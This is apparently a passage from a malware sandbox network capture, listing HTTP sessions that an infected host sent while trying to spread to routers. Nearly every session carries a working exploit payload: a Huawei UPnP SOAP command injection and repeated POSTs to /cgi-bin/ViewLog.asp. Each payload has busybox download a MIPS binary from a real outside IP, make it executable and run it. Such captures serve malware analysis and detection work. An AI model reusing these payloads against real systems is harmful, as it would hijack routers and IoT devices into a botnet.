                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:17:25.080642939 CET236INHTTP/1.1 500 Internal Server Error
                                              Content-Type: text/xml; charset="utf-8"
                                              Server: Linux UPnP/1.0 Huawei-ATP-IGD
                                              EXT:
                                              Connection: Keep-Alive
                                              Content-Length: 398


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              415192.168.2.144755895.86.104.848080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:26.279776096 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:27.618993998 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              416192.168.2.144782859.110.72.14923
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:28.685094118 CET121INHTTP/1.0 200 OK
                                              Server: Proxy
                                              Data Raw: 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 0a
                                              Data Ascii: Unauthorized ...IP Address:


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              417192.168.2.145687831.136.156.1468080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:29.519448996 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:30.114919901 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:31.266901016 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:33.698740959 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:38.306550026 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:47.522175074 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:06.209490061 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              418192.168.2.145939831.43.191.2388080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:29.519545078 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:29.712199926 CET368INHTTP/1.1 404 Not Found
                                              Server: openresty
                                              Date: Thu, 23 Nov 2023 04:17:29 GMT
                                              Content-Type: text/html
                                              Content-Length: 150
                                              Connection: keep-alive
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              419192.168.2.144120294.120.214.2028080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:29.545471907 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              420192.168.2.143887885.10.229.48080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:29.715512037 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:30.754898071 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:30.945966005 CET508INHTTP/1.1 403 Forbidden
                                              Date: Thu, 23 Nov 2023 04:17:30 GMT
                                              Server: Apache
                                              Vary: Accept-Encoding
                                              Content-Encoding: gzip
                                              Content-Length: 193
                                              Keep-Alive: timeout=15, max=100
                                              Connection: Keep-Alive
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 8e 3b 0f 82 40 10 84 fb fb 15 2b 8d 15 ac af f2 72 85 3c 22 09 2a 05 9a 50 02 b7 91 4b 80 23 dc 89 f1 df cb a3 b1 9c d9 6f 76 86 6f 82 bb 9f e5 69 08 97 ec 9a 40 fa 38 27 b1 0f 8e 8b 18 87 59 84 18 64 c1 7a 39 78 3b c4 f0 e6 08 c6 6b db 36 82 d7 54 c8 49 58 65 1b 12 a7 dd 11 22 3d 94 4a 4a ea 38 ae 26 e3 b8 40 bc d4 f2 3b e7 f6 e2 8f 99 14 e3 bd c8 f5 1b a4 ee b6 16 ea 62 24 e8 69 68 95 31 4a 77 60 35 14 55 45 c6 00 56 2f e5 96 aa c3 a7 a2 4f a2 5f 5e 61 7a 36 13 b5 32 60 68 18 69 f0 38 f6 73 e1 52 35 3d 9f 27 b2 1f bd cc 11 ff dd 00 00 00
                                              Data Ascii: M;@+r<"*PK#ovoi@8'Ydz9x;k6TIXe"=JJ8&@;b$ih1Jw`5UEV/O_^az62`hi8sR5='


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              421192.168.2.145977094.120.37.1658080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:29.771852016 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              422192.168.2.144447631.200.48.908080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:29.772161007 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              423192.168.2.145479862.29.11.458080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:29.993598938 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              424192.168.2.145660494.122.229.318080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:29.995362043 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              425192.168.2.143609694.120.8.1378080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:29.995717049 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              426192.168.2.144756695.86.104.848080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:30.580415010 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:34.722714901 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              427192.168.2.143553294.125.143.1538080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:31.519443989 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
